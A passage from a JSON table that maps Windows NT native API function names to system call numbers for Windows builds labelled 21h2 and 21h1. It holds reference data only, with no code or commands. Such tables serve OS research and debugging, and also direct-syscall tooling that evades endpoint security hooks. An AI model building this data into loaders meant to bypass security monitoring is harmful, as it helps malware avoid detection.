416, \"NtSetIoCompletion\": 417, \"NtSetIoCompletionEx\": 418, \"NtSetLdtEntries\": 419, \"NtSetLowEventPair\": 420, \"NtSetLowWaitHighEventPair\": 421, \"NtSetQuotaInformationFile\": 422, \"NtSetSecurityObject\": 423, \"NtSetSystemEnvironmentValue\": 424, \"NtSetSystemEnvironmentValueEx\": 425, \"NtSetSystemInformation\": 426, \"NtSetSystemPowerState\": 427, \"NtSetSystemTime\": 428, \"NtSetThreadExecutionState\": 429, \"NtSetTimer2\": 430, \"NtSetTimerEx\": 431, \"NtSetTimerResolution\": 432, \"NtSetUuidSeed\": 433, \"NtSetVolumeInformationFile\": 434, \"NtSetWnfProcessNotificationEvent\": 435, \"NtShutdownSystem\": 436, \"NtShutdownWorkerFactory\": 437, \"NtSignalAndWaitForSingleObject\": 438, \"NtSinglePhaseReject\": 439, \"NtStartProfile\": 440, \"NtStopProfile\": 441, \"NtSubscribeWnfStateChange\": 442, \"NtSuspendProcess\": 443, \"NtSuspendThread\": 444, \"NtSystemDebugControl\": 445, \"NtTerminateEnclave\": 446, \"NtTerminateJobObject\": 447, \"NtTestAlert\": 448, \"NtThawRegistry\": 449, \"NtThawTransactions\": 450, \"NtTraceControl\": 451, \"NtTranslateFilePath\": 452, \"NtUmsThreadYield\": 453, \"NtUnloadDriver\": 454, \"NtUnloadKey\": 455, \"NtUnloadKey2\": 456, \"NtUnloadKeyEx\": 457, \"NtUnlockFile\": 458, \"NtUnlockVirtualMemory\": 459, \"NtUnmapViewOfSectionEx\": 460, \"NtUnsubscribeWnfStateChange\": 461, \"NtUpdateWnfStateData\": 462, \"NtVdmControl\": 463, \"NtWaitForAlertByThreadId\": 464, \"NtWaitForDebugEvent\": 465, \"NtWaitForKeyedEvent\": 466, \"NtWaitForWorkViaWorkerFactory\": 467, \"NtWaitHighEventPair\": 468, \"NtWaitLowEventPair\": 469, \"NtLoadKey3\": 470},\"21h2\":{\"NtAccessCheck\": 0, \"NtAccessCheckAndAuditAlarm\": 41, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireCrossVmMutant\": 103, \"NtAcquireProcessActivityReference\": 104, \"NtAddAtom\": 655431, \"NtAddAtomEx\": 1114217, \"NtAddBootEntry\": 106, \"NtAddDriverEntry\": 107, \"NtAdjustGroupsToken\": 108, \"NtAdjustPrivilegesToken\": 65, \"NtAdjustTokenClaimsAndDeviceGroups\": 109, \"NtAlertResumeThread\": 458862, \"NtAlertThread\": 196719, \"NtAlertThreadByThreadId\": 262256, \"NtAllocateLocallyUniqueId\": 262257, \"NtAllocateReserveObject\": 114, \"NtAllocateUserPhysicalPages\": 115, \"NtAllocateUserPhysicalPagesEx\": 116, \"NtAllocateUuids\": 1114229, \"NtAllocateVirtualMemory\": 24, \"NtAllocateVirtualMemoryEx\": 118, \"NtAlpcAcceptConnectPort\": 119, \"NtAlpcCancelMessage\": 120, \"NtAlpcConnectPort\": 121, \"NtAlpcConnectPortEx\": 122, \"NtAlpcCreatePort\": 123, \"NtAlpcCreatePortSection\": 124, \"NtAlpcCreateResourceReserve\": 125, \"NtAlpcCreateSectionView\": 126, \"NtAlpcCreateSecurityContext\": 127, \"NtAlpcDeletePortSection\": 128, \"NtAlpcDeleteResourceReserve\": 129, \"NtAlpcDeleteSectionView\": 130, \"NtAlpcDeleteSecurityContext\": 131, \"NtAlpcDisconnectPort\": 132, \"NtAlpcImpersonateClientContainerOfPort\": 133, \"NtAlpcImpersonateClientOfPort\": 134, \"NtAlpcOpenSenderProcess\": 135, \"NtAlpcOpenSenderThread\": 136, \"NtAlpcQueryInformation\": 137, \"NtAlpcQueryInformationMessage\": 138, \"NtAlpcRevokeSecurityContext\": 139, \"NtAlpcSendWaitReceivePort\": 140, \"NtAlpcSetInformation\": 141, \"NtApphelpCacheControl\": 76, \"NtAreMappedFilesTheSame\": 327822, \"NtAssignProcessToJobObject\": 524431, \"NtAssociateWaitCompletionPacket\": 144, \"NtCallEnclave\": 145, \"NtCallbackReturn\": 5, \"NtCancelIoFile\": 93, \"NtCancelIoFileEx\": 146, \"NtCancelSynchronousIoFile\": 147, \"NtCancelTimer\": 97, \"NtCancelTimer2\": 148, \"NtCancelWaitCompletionPacket\": 149, \"NtClearEvent\": 196670, \"NtClose\": 196623, \"NtCloseObjectAuditAlarm\": 59, \"NtCommitComplete\": 150, \"NtCommitEnlistment\": 151, \"NtCommitRegistryTransaction\": 152, \"NtCommitTransaction\": 153, \"NtCompactKeys\": 154, \"NtCompareObjects\": 155, \"NtCompareSigningLevels\": 156, \"NtCompareTokens\": 157, \"NtCompleteConnectPort\": 158, \"NtCompressKey\": 196767, \"NtConnectPort\": 160, \"NtContinue\": 67, \"NtContinueEx\": 161, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 162, \"NtCreateCrossVmEvent\": 163, \"NtCreateCrossVmMutant\": 164, \"NtCreateDebugObject\": 165, \"NtCreateDirectoryObject\": 166, \"NtCreateDirectoryObjectEx\": 167, \"NtCreateEnclave\": 168, \"NtCreateEnlistment\": 169, \"NtCreateEvent\": 72, \"NtCreateEventPair\": 170, \"NtCreateFile\": 85, \"NtCreateIRTimer\": 171, \"NtCreateIoCompletion\": 172, \"NtCreateJobObject\": 173, \"NtCreateJobSet\": 174, \"NtCreateKey\": 29, \"NtCreateKeyTransacted\": 175, \"NtCreateKeyedEvent\": 176, \"NtCreateLowBoxToken\": 177, \"NtCreateMailslotFile\": 178, \"NtCreateMutant\": 179, \"NtCreateNamedPipeFile\": 180, \"NtCreatePagingFile\": 181, \"NtCreatePartition\": 182, \"NtCreatePort\": 183, \"NtCreatePrivateNamespace\": 184, \"NtCreateProcess\": 185, \"NtCreateProcessEx\": 77, \"NtCreateProfile\": 186, \"NtCreateProfileEx\": 187, \"NtCreateRegistryTransaction\": 188, \"NtCreateResourceManager\": 189, \"NtCreateSection\": 74, \"NtCreateSectionEx\": 190, \"NtCreateSemaphore\": 191, \"NtCreateSymbolicLinkObject\": 192, \"NtCreateThread\": 78, \"NtCreateThreadEx\": 193, \"NtCreateTimer\": 194, \"NtCreateTimer2\": 195, \"NtCreateToken\": 196, \"NtCreateTokenEx\": 197, \"NtCreateTransaction\": 198, \"NtCreateTransactionManager\": 199, \"NtCreateUserProcess\": 200, \"NtCreateWaitCompletionPacket\": 201, \"NtCreateWaitablePort\": 202, \"NtCreateWnfStateName\": 203, \"NtCreateWorkerFactory\": 204, \"NtDebugActiveProcess\": 524493, \"NtDebugContinue\": 206, \"NtDelayExecution\": 393268, \"NtDeleteAtom\": 262351, \"NtDeleteBootEntry\": 208, \"NtDeleteDriverEntry\": 209, \"NtDeleteFile\": 210, \"NtDeleteKey\": 211, \"NtDeleteObjectAuditAlarm\": 212, \"NtDeletePrivateNamespace\": 213, \"NtDeleteValueKey\": 214, \"NtDeleteWnfStateData\": 215, \"NtDeleteWnfStateName\": 216, \"NtDeviceIoControlFile\": 1769479, \"NtDirectGraphicsCall\": 217, \"NtDisableLastKnownGood\": 218, \"NtDisplayString\": 219, \"NtDrawText\": 220, \"NtDuplicateObject\": 60, \"NtDuplicateToken\": 66, \"NtEnableLastKnownGood\": 221, \"NtEnumerateBootEntries\": 222, \"NtEnumerateDriverEntries\": 223, \"NtEnumerateKey\": 50, \"NtEnumerateSystemEnvironmentValuesEx\": 224, \"NtEnumerateTransactionObject\": 225, \"NtEnumerateValueKey\": 19, \"NtExtendSection\": 226, \"NtFilterBootOption\": 227, \"NtFilterToken\": 228, \"NtFilterTokenEx\": 229, \"NtFindAtom\": 655380, \"NtFlushBuffersFile\": 75, \"NtFlushBuffersFileEx\": 230, \"NtFlushInstallUILanguage\": 231, \"NtFlushInstructionCache\": 786664, \"NtFlushKey\": 196841, \"NtFlushProcessWriteBuffers\": 234, \"NtFlushVirtualMemory\": 235, \"NtFlushWriteBuffer\": 65772, \"NtFreeUserPhysicalPages\": 237, \"NtFreeVirtualMemory\": 30, \"NtFreezeRegistry\": 238, \"NtFreezeTransactions\": 239, \"NtFsControlFile\": 1769529, \"NtGetCachedSigningLevel\": 240, \"NtGetCompleteWnfStateSubscription\": 241, \"NtGetContextThread\": 242, \"NtGetCurrentProcessorNumber\": 1638643, \"NtGetCurrentProcessorNumberEx\": 244, \"NtGetDevicePowerState\": 458997, \"NtGetMUIRegistryInfo\": 246, \"NtGetNextProcess\": 247, \"NtGetNextThread\": 248, \"NtGetNlsSectionPtr\": 249, \"NtGetNotificationResourceManager\": 250, \"NtGetWriteWatch\": 251, \"NtImpersonateAnonymousToken\": 196860, \"NtImpersonateClientOfPort\": 458783, \"NtImpersonateThread\": 253, \"NtInitializeEnclave\": 254, \"NtInitializeNlsFiles\": 255, \"NtInitializeRegistry\": 256, \"NtInitiatePowerAction\": 1114369, \"NtIsProcessInJob\": 524367, \"NtIsSystemResumeAutomatic\": 65794, \"NtIsUILanguageComitted\": 259, \"NtListenPort\": 260, \"NtLoadDriver\": 261, \"NtLoadEnclaveData\": 262, \"NtLoadKey\": 263, \"NtLoadKey2\": 264, \"NtLoadKey3\": 470, \"NtLoadKeyEx\": 265, \"NtLockFile\": 266, \"NtLockProductActivationKeys\": 327947, \"NtLockRegistryKey\": 196876, \"NtLockVirtualMemory\": 269, \"NtMakePermanentObject\": 196878, \"NtMakeTemporaryObject\": 196879, \"NtManageHotPatch\": 272, \"NtManagePartition\": 273, \"NtMapCMFModule\": 274, \"NtMapUserPhysicalPages\": 655635, \"NtMapUserPhysicalPagesScatter\": 655363, \"NtMapViewOfSection\": 40, \"NtMapViewOfSectionEx\": 276, \"NtModifyBootEntry\": 277, \"NtModifyDriverEntry\": 278, \"NtNotifyChangeDirectoryFile\": 279, \"NtNotifyChangeDirectoryFileEx\": 280, \"NtNotifyChangeKey\": 281, \"NtNotifyChangeMultipleKeys\": 282, \"NtNotifyChangeSession\": 283, \"NtOpenDirectoryObject\": 88, \"NtOpenEnlistment\": 284, \"NtOpenEvent\": 64, \"NtOpenEventPair\": 285, \"NtOpenFile\": 51, \"NtOpenIoCompletion\": 286, \"NtOpenJobObject\": 287, \"NtOpenKey\": 18, \"NtOpenKeyEx\": 288, \"NtOpenKeyTransacted\": 289, \"NtOpenKeyTransactedEx\": 290, \"NtOpenKeyedEvent\": 291, \"NtOpenMutant\": 292, \"NtOpenObjectAuditAlarm\": 293, \"NtOpenPartition\": 294, \"NtOpenPrivateNamespace\": 295, \"NtOpenProcess\": 38, \"NtOpenProcessToken\": 296, \"NtOpenProcessTokenEx\": 48, \"NtOpenRegistryTransaction\": 297, \"NtOpenResourceManager\": 298, \"NtOpenSection\": 55, \"NtOpenSemaphore\": 299, \"NtOpenSession\": 300, \"NtOpenSymbolicLinkObject\": 301, \"NtOpenThread\": 302, \"NtOpenThreadToken\": 36, \"NtOpenThreadTokenEx\": 47, \"NtOpenTimer\": 303, \"NtOpenTransaction\": 304, \"NtOpenTransactionManager\": 305, \"NtPlugPlayControl\": 306, \"NtPowerInformation\": 95, \"NtPrePrepareComplete\": 307, \"NtPrePrepareEnlistment\": 308, \"NtPrepareComplete\": 309, \"NtPrepareEnlistment\": 310, \"NtPrivilegeCheck\": 786743, \"NtPrivilegeObjectAuditAlarm\": 312, \"NtPrivilegedServiceAuditAlarm\": 313, \"NtPropagationComplete\": 314, \"NtPropagationFailed\": 315, \"NtProtectVirtualMemory\": 80, \"NtPssCaptureVaSpaceBulk\": 316, \"NtPulseEvent\": 459069, \"NtQueryAttributesFile\": 61, \"NtQueryAuxiliaryCounterFrequency\": 318, \"NtQueryBootEntryOrder\": 319, \"NtQueryBootOptions\": 320, \"NtQueryDebugFilterState\": 328001, \"NtQueryDefaultLocale\": 327701, \"NtQueryDefaultUILanguage\": 262212, \"NtQueryDirectoryFile\": 53, \"NtQueryDirectoryFileEx\": 322, \"NtQueryDirectoryObject\": 323, \"NtQueryDriverEntryOrder\": 324, \"NtQueryEaFile\": 325, \"NtQueryEvent\": 86, \"NtQueryFullAttributesFile\": 326, \"NtQueryInformationAtom\": 327, \"NtQueryInformationByName\": 328, \"NtQueryInformationEnlistment\": 329, \"NtQueryInformationFile\": 17, \"NtQueryInformationJobObject\": 330, \"NtQueryInformationPort\": 331, \"NtQueryInformationProcess\": 25, \"NtQueryInformationResourceManager\": 332, \"NtQueryInformationThread\": 37, \"NtQueryInformationToken\": 33, \"NtQueryInformationTransaction\": 333, \"NtQueryInformationTransactionManager\": 334, \"NtQueryInformationWorkerFactory\": 335, \"NtQueryInstallUILanguage\": 262480, \"NtQueryIntervalProfile\": 328017, \"NtQueryIoCompletion\": 338, \"NtQueryKey\": 22, \"NtQueryLicenseValue\": 339, \"NtQueryMultipleValueKey\": 340, \"NtQueryMutant\": 341, \"NtQueryObject\": 272, \"NtQueryOpenSubKeys\": 342, \"NtQueryOpenSubKeysEx\": 343, \"NtQueryPerformanceCounter\": 327729, \"NtQueryPortInformationProcess\": 65880, \"NtQueryQuotaInformationFile\": 345, \"NtQuerySection\": 81, \"NtQuerySecurityAttributesToken\": 346, \"NtQuerySecurityObject\": 347, \"NtQuerySecurityPolicy\": 348, \"NtQuerySemaphore\": 349, \"NtQuerySymbolicLinkObject\": 350, \"NtQuerySystemEnvironmentValue\": 351, \"NtQuerySystemEnvironmentValueEx\": 352, \"NtQuerySystemInformation\": 54, \"NtQuerySystemInformationEx\": 353, \"NtQueryTimer\": 56, \"NtQueryTimerResolution\": 655714, \"NtQueryValueKey\": 23, \"NtQueryVirtualMemory\": 35, \"NtQueryVolumeInformationFile\": 73, \"NtQueryWnfStateData\": 355, \"NtQueryWnfStateNameInformation\": 356, \"NtQueueApcThread\": 69, \"NtQueueApcThreadEx\": 357, \"NtRaiseException\": 358, \"NtRaiseHardError\": 359, \"NtReadFile\": 1703942, \"NtReadFileScatter\": 1703982, \"NtReadOnlyEnlistment\": 360, \"NtReadRequestData\": 84, \"NtReadVirtualMemory\": 63, \"NtRecoverEnlistment\": 361, \"NtRecoverResourceManager\": 362, \"NtRecoverTransactionManager\": 363, \"NtRegisterProtocolAddressInformation\": 364, \"NtRegisterThreadTerminatePort\": 196973, \"NtReleaseKeyedEvent\": 1311086, \"NtReleaseMutant\": 458784, \"NtReleaseSemaphore\": 786442, \"NtReleaseWorkerFactoryWorker\": 196975, \"NtRemoveIoCompletion\": 1835017, \"NtRemoveIoCompletionEx\": 368, \"NtRenameKey\": 370, \"NtRenameTransactionManager\": 371, \"NtReplaceKey\": 372, \"NtReplacePartitionUnit\": 373, \"NtReplyPort\": 12, \"NtReplyWaitReceivePort\": 11, \"NtReplyWaitReceivePortEx\": 43, \"NtReplyWaitReplyPort\": 374, \"NtRequestPort\": 375, \"NtRequestWaitReplyPort\": 34, \"NtResetEvent\": 459128, \"NtResetWriteWatch\": 786809, \"NtRestoreKey\": 378, \"NtResumeProcess\": 196987, \"NtResumeThread\": 458834, \"NtRevertContainerImpersonation\": 380, \"NtRollbackComplete\": 381, \"NtRollbackEnlistment\": 382, \"NtRollbackRegistryTransaction\": 383, \"NtRollbackTransaction\": 384, \"NtRollforwardTransactionManager\": 385, \"NtSaveKey\": 524674, \"NtSaveKeyEx\": 917891, \"NtSaveMergedKeys\": 721284, \"NtSecureConnectPort\": 389, \"NtSerializeBoot\": 390, \"NtSetBootEntryOrder\": 391, \"NtSetBootOptions\": 392, \"NtSetCachedSigningLevel\": 393, \"NtSetCachedSigningLevel2\": 394, \"NtSetContextThread\": 395, \"NtSetDebugFilterState\": 655756, \"NtSetDefaultHardErrorPort\": 197005, \"NtSetDefaultLocale\": 328078, \"NtSetDefaultUILanguage\": 262543, \"NtSetDriverEntryOrder\": 400, \"NtSetEaFile\": 401, \"NtSetEvent\": 458766, \"NtSetEventBoostPriority\": 196653, \"NtSetHighEventPair\": 197010, \"NtSetHighWaitLowEventPair\": 197011, \"NtSetIRTimer\": 459156, \"NtSetInformationDebugObject\": 405, \"NtSetInformationEnlistment\": 406, \"NtSetInformationFile\": 39, \"NtSetInformationJobObject\": 407, \"NtSetInformationKey\": 408, \"NtSetInformationObject\": 92, \"NtSetInformationProcess\": 28, \"NtSetInformationResourceManager\": 409, \"NtSetInformationSymbolicLink\": 410, \"NtSetInformationThread\": 13, \"NtSetInformationToken\": 411, \"NtSetInformationTransaction\": 412, \"NtSetInformationTransactionManager\": 413, \"NtSetInformationVirtualMemory\": 414, \"NtSetInformationWorkerFactory\": 415, \"NtSetIntervalProfile\": 328096, \"NtSetIoCompletion\": 417, \"NtSetIoCompletionEx\": 418, \"NtSetLdtEntries\": 419, \"NtSetLowEventPair\": 197028, \"NtSetLowWaitHighEventPair\": 197029, \"NtSetQuotaInformationFile\": 422, \"NtSetSecurityObject\": 423, \"NtSetSystemEnvironmentValue\": 424, \"NtSetSystemEnvironmentValueEx\": 425, \"NtSetSystemInformation\": 426, \"NtSetSystemPowerState\": 427, \"NtSetSystemTime\": 328108, \"NtSetThreadExecutionState\": 328109, \"NtSetTimer\": 98, \"NtSetTimer2\": 430, \"NtSetTimerEx\": 431, \"NtSetTimerResolution\": 655792, \"NtSetUuidSeed\": 262577, \"NtSetValueKey\": 96, \"NtSetVolumeInformationFile\": 434, \"NtSetWnfProcessNotificationEvent\": 435, \"NtShutdownSystem\": 262580, \"NtShutdownWorkerFactory\": 437, \"NtSignalAndWaitForSingleObject\": 197046, \"NtSinglePhaseReject\": 439, \"NtStartProfile\": 197048, \"NtStopProfile\": 197049, \"NtSubscribeWnfStateChange\": 442, \"NtSuspendProcess\": 197051, \"NtSuspendThread\": 459196, \"NtSystemDebugControl\": 445, \"NtTerminateEnclave\": 446, \"NtTerminateJobObject\": 459199, \"NtTerminateProcess\": 458796, \"NtTerminateThread\": 458835, \"NtTestAlert\": 131520, \"NtThawRegistry\": 449, \"NtThawTransactions\": 450, \"NtTraceControl\": 451, \"NtTraceEvent\": 94, \"NtTranslateFilePath\": 1114564, \"NtUmsThreadYield\": 453, \"NtUnloadDriver\": 454, \"NtUnloadKey\": 455, \"NtUnloadKey2\": 456, \"NtUnloadKeyEx\": 457, \"NtUnlockFile\": 458, \"NtUnlockVirtualMemory\": 459, \"NtUnmapViewOfSection\": 42, \"NtUnmapViewOfSectionEx\": 460, \"NtUnsubscribeWnfStateChange\": 461, \"NtUpdateWnfStateData\": 462, \"NtVdmControl\": 463, \"NtWaitForAlertByThreadId\": 393680, \"NtWaitForDebugEvent\": 465, \"NtWaitForKeyedEvent\": 1376722, \"NtWaitForMultipleObjects\": 1900635, \"NtWaitForMultipleObjects32\": 1966106, \"NtWaitForSingleObject\": 851972, \"NtWaitForWorkViaWorkerFactory\": 467, \"NtWaitHighEventPair\": 197076, \"NtWaitLowEventPair\": 197077, \"NtWorkerFactoryWorkerReady\": 196609, \"NtWriteFile\": 1703944, \"NtWriteFileGather\": 1703963, \"NtWriteRequestData\": 87, \"NtWriteVirtualMemory\": 58, \"NtYieldExecution\": 65606, \"RtlGetNativeSystemInformation\": 54}, \"21h1\":{\"NtAccessCheck\": 0, \"NtAccessCheckAndAuditAlarm\": 41, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireCrossVmMutant\": 103, \"NtAcquireProcessActivityReference\": 104, \"NtAddAtom\": 655431, \"NtAddAtomEx\": 1114217, \"NtAddBootEntry\": 106, \"NtAddDriverEntry\": 107, \"NtAdjustGroupsToken\": 108, \"NtAdjustPrivilegesToken\": 65, \"NtAdjustTokenClaimsAndDeviceGroups\": 109, \"NtAlertResumeThread\": 458862, \"NtAlertThread\": 196719, \"NtAlertThreadByThreadId\": 262256, \"NtAllocateLocallyUniqueId\": 262257, \"NtAllocateReserveObject\": 114, \"NtAllocateUserPhysicalPages\": 115, \"NtAllocateUserPhysicalPagesEx\": 116, \"NtAllocateUuids\": 1114229, \"NtAllocateVirtualMemory\": 24, \"NtAllocateVirtualMemoryEx\": 118, \"NtAlpcAcceptConnectPort\": 119, \"NtAlpcCancelMessage\": 120, \"NtAlpcConnectPort\": 121, \"NtAlpcConnectPortEx\": 122, \"NtAlpcCreatePort\": 123, \"NtAlpcCreatePortSection\": 124, \"NtAlpcCreateResourceReserve\": 125, \"NtAlpcCreateSectionView\": 126, \"NtAlpcCreateSecurityContext\": 127, \"NtAlpcDeletePortSection\": 128, \"NtAlpcDeleteResourceReserve\": 129, \"NtAlpcDeleteSectionView\": 130, \"NtAlpcDeleteSecurityContext\": 131, \"NtAlpcDisconnectPort\": 132, \"NtAlpcImpersonateClientContainerOfPort\": 133, \"NtAlpcImpersonateClientOfPort\": 134, \"NtAlpcOpenSenderProcess\": 135, \"NtAlpcOpenSenderThread\": 136, \"NtAlpcQueryInformation\": 137, \"NtAlpcQueryInformationMessage\": 138, \"NtAlpcRevokeSecurityContext\": 139, \"NtAlpcSendWaitReceivePort\": 140, \"NtAlpcSetInformation\": 141, \"NtApphelpCacheControl\": 76, \"NtAreMappedFilesTheSame\": 327822, \"NtAssignProcessToJobObject\": 524431, \"NtAssociateWaitCompletionPacket\": 144, \"NtCallEnclave\": 145, \"NtCallbackReturn\": 5, \"NtCancelIoFile\": 93, \"NtCancelIoFileEx\": 146, \"NtCancelSynchronousIoFile\": 147, \"NtCancelTimer\": 458849, \"NtCancelTimer2\": 148, \"NtCancelWaitCompletionPacket\": 149, \"NtClearEvent\": 196670, \"NtClose\": 196623, \"NtCloseObjectAuditAlarm\": 59, \"NtCommitComplete\": 150, \"NtCommitEnlistment\": 151, \"NtCommitRegistryTransaction\": 152, \"NtCommitTransaction\": 153, \"NtCompactKeys\": 154, \"NtCompareObjects\": 155, \"NtCompareSigningLevels\": 156, \"NtCompareTokens\": 157, \"NtCompleteConnectPort\": 158, \"NtCompressKey\": 196767, \"NtConnectPort\": 160, \"NtContinue\": 67, \"NtContinueEx\": 161, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 162, \"NtCreateCrossVmEvent\": 163, \"NtCreateCrossVmMutant\": 164, \"NtCreateDebugObject\": 165, \"NtCreateDirectoryObject\": 166, \"NtCreateDirectoryObjectEx\": 167, \"NtCreateEnclave\": 168, \"NtCreateEnlistment\": 169, \"NtCreateEvent\": 72, \"NtCreateEventPair\": 170, \"NtCreateFile\": 85, \"NtCreateIRTimer\": 171, \"NtCreateIoCompletion\": 172, \"NtCreateJobObject\": 173, \"NtCreateJobSet\": 174, \"NtCreateKey\": 29, \"NtCreateKeyTransacted\": 175, \"NtCreateKeyedEvent\": 176, \"NtCreateLowBoxToken\": 177, \"NtCreateMailslotFile\": 178, \"NtCreateMutant\": 179, \"NtCreateNamedPipeFile\": 180, \"NtCreatePagingFile\": 181, \"NtCreatePartition\": 182, \"NtCreatePort\": 183, \"NtCreatePrivateNamespace\": 184, \"NtCreateProcess\": 185, \"NtCreateProcessEx\": 77, \"NtCreateProfile\": 186, \"NtCreateProfileEx\": 187, \"NtCreateRegistryTransaction\": 188, \"NtCreateResourceManager\": 189, \"NtCreateSection\": 74, \"NtCreateSectionEx\": 190, \"NtCreateSemaphore\": 191, \"NtCreateSymbolicLinkObject\": 192, \"NtCreateThread\": 78, \"NtCreateThreadEx\": 193, \"NtCreateTimer\": 194, \"NtCreateTimer2\": 195, \"NtCreateToken\": 196, \"NtCreateTokenEx\": 197, \"NtCreateTransaction\": 198, \"NtCreateTransactionManager\": 199, \"NtCreateUserProcess\": 200, \"NtCreateWaitCompletionPacket\": 201, \"NtCreateWaitablePort\": 202, \"NtCreateWnfStateName\": 203, \"NtCreateWorkerFactory\": 204, \"NtDebugActiveProcess\": 524493, \"NtDebugContinue\": 206, \"NtDelayExecution\": 393268, \"NtDeleteAtom\": 262351, \"NtDeleteBootEntry\": 208, \"NtDeleteDriverEntry\": 209, \"NtDeleteFile\": 210, \"NtDeleteKey\": 211, \"NtDeleteObjectAuditAlarm\": 212, \"NtDeletePrivateNamespace\": 213, \"NtDeleteValueKey\": 214, \"NtDeleteWnfStateData\": 215, \"NtDeleteWnfStateName\": 216, \"NtDeviceIoControlFile\": 1769479, \"NtDirectGraphicsCall\": 217, \"NtDisableLastKnownGood\": 218, \"NtDisplayString\": 219, \"NtDrawText\": 220, \"NtDuplicateObject\": 60, \"NtDuplicateToken\": 66, \"NtEnableLastKnownGood\": 221, \"NtEnumerateBootEntries\": 222, \"NtEnumerateDriverEntries\": 223, \"NtEnumerateKey\": 50, \"NtEnumerateSystemEnvironmentValuesEx\": 224, \"NtEnumerateTransactionObject\": 225, \"NtEnumerateValueKey\": 19, \"NtExtendSection\": 226, \"NtFilterBootOption\": 227, \"NtFilterToken\": 228, \"NtFilterTokenEx\": 229, \"NtFindAtom\": 655380, \"NtFlushBuffersFile\": 75, \"NtFlushBuffersFileEx\": 230, \"NtFlushInstallUILanguage\": 231, \"NtFlushInstructionCache\": 786664, \"NtFlushKey\": 196841, \"NtFlushProcessWriteBuffers\": 234, \"NtFlushVirtualMemory\": 235, \"NtFlushWriteBuffer\": 65772, \"NtFreeUserPhysicalPages\": 237, \"NtFreeVirtualMemory\": 30, \"NtFreezeRegistry\": 238, \"NtFreezeTransactions\": 239, \"NtFsControlFile\": 1769529, \"NtGetCachedSigningLevel\": 240, \"NtGetCompleteWnfStateSubscription\": 241, \"NtGetContextThread\": 242, \"NtGetCurrentProcessorNumber\": 1638643, \"NtGetCurrentProcessorNumberEx\": 244, \"NtGetDevicePowerState\": 458997, \"NtGetMUIRegistryInfo\": 246, \"NtGetNextProcess\": 247, \"NtGetNextThread\": 248, \"NtGetNlsSectionPtr\": 249, \"NtGetNotificationResourceManager\": 250, \"NtGetWriteWatch\": 251, \"NtImpersonateAnonymousToken\": 196860, \"NtImpersonateClientOfPort\": 458783, \"NtImpersonateThread\": 253, \"NtInitializeEnclave\": 254, \"NtInitializeNlsFiles\": 255, \"NtInitializeRegistry\": 256, \"NtInitiatePowerAction\": 1114369, \"NtIsProcessInJob\": 524367, \"NtIsSystemResumeAutomatic\": 65794, \"NtIsUILanguageComitted\": 259, \"NtListenPort\": 260, \"NtLoadDriver\": 261, \"NtLoadEnclaveData\": 262, \"NtLoadKey\": 263, \"NtLoadKey2\": 264, \"NtLoadKey3\": 470, \"NtLoadKeyEx\": 265, \"NtLockFile\": 266, \"NtLockProductActivationKeys\": 327947, \"NtLockRegistryKey\": 196876, \"NtLockVirtualMemory\": 269, \"NtMakePermanentObject\": 196878, \"NtMakeTemporaryObject\": 196879, \"NtManageHotPatch\": 272, \"NtManagePartition\": 273, \"NtMapCMFModule\": 274, \"NtMapUserPhysicalPages\": 655635, \"NtMapUserPhysicalPagesScatter\": 655363, \"NtMapViewOfSection\": 40, \"NtMapViewOfSectionEx\": 276, \"NtModifyBootEntry\": 277, \"NtModifyDriverEntry\": 278, \"NtNotifyChangeDirectoryFile\": 279, \"NtNotifyChangeDirectoryFileEx\": 280, \"NtNotifyChangeKey\": 281, \"NtNotifyChangeMultipleKeys\": 282, \"NtNotifyChangeSession\": 283, \"NtOpenDirectoryObject\": 88, \"NtOpenEnlistment\": 284, \"NtOpenEvent\": 64, \"NtOpenEventPair\": 285, \"NtOpenFile\": 51, \"NtOpenIoCompletion\": 286, \"NtOpenJobObject\": 287, \"NtOpenKey\": 18, \"NtOpenKeyEx\": 288, \"NtOpenKeyTransacted\": 289, \"NtOpenKeyTransactedEx\": 290, \"NtOpenKeyedEvent\": 291, \"NtOpenMutant\": 292, \"NtOpenObjectAuditAlarm\": 293, \"NtOpenPartition\": 294, \"NtOpenPrivateNamespace\": 295, \"NtOpenProcess\": 38, \"NtOpenProcessToken\": 296, \"NtOpenProcessTokenEx\": 48, \"NtOpenRegistryTransaction\": 297, \"NtOpenResourceManager\": 298, \"NtOpenSection\": 55, \"NtOpenSemaphore\": 299, \"NtOpenSession\": 300, \"NtOpenSymbolicLinkObject\": 301, \"NtOpenThread\": 302, \"NtOpenThreadToken\": 36, \"NtOpenThreadTokenEx\": 47, \"NtOpenTimer\": 303, \"NtOpenTransaction\": 304, \"NtOpenTransactionManager\": 305, \"NtPlugPlayControl\": 306, \"NtPowerInformation\": 95, \"NtPrePrepareComplete\": 307, \"NtPrePrepareEnlistment\": 308, \"NtPrepareComplete\": 309, \"NtPrepareEnlistment\": 310, \"NtPrivilegeCheck\": 786743, \"NtPrivilegeObjectAuditAlarm\": 312, \"NtPrivilegedServiceAuditAlarm\": 313, \"NtPropagationComplete\": 314, \"NtPropagationFailed\": 315, \"NtProtectVirtualMemory\": 80, \"NtPssCaptureVaSpaceBulk\": 316, \"NtPulseEvent\": 459069, \"NtQueryAttributesFile\": 61, \"NtQueryAuxiliaryCounterFrequency\": 318, \"NtQueryBootEntryOrder\": 319, \"NtQueryBootOptions\": 320, \"NtQueryDebugFilterState\": 328001, \"NtQueryDefaultLocale\": 327701, \"NtQueryDefaultUILanguage\": 262212, \"NtQueryDirectoryFile\": 53, \"NtQueryDirectoryFileEx\": 322, \"NtQueryDirectoryObject\": 323, \"NtQueryDriverEntryOrder\": 324, \"NtQueryEaFile\": 325, \"NtQueryEvent\": 86, \"NtQueryFullAttributesFile\": 326, \"NtQueryInformationAtom\": 327, \"NtQueryInformationByName\": 328, \"NtQueryInformationEnlistment\": 329, \"NtQueryInformationFile\": 17, \"NtQueryInformationJobObject\": 330, \"NtQueryInformationPort\": 331, \"NtQueryInformationProcess\": 25, \"NtQueryInformationResourceManager\": 332, \"NtQueryInformationThread\": 37, 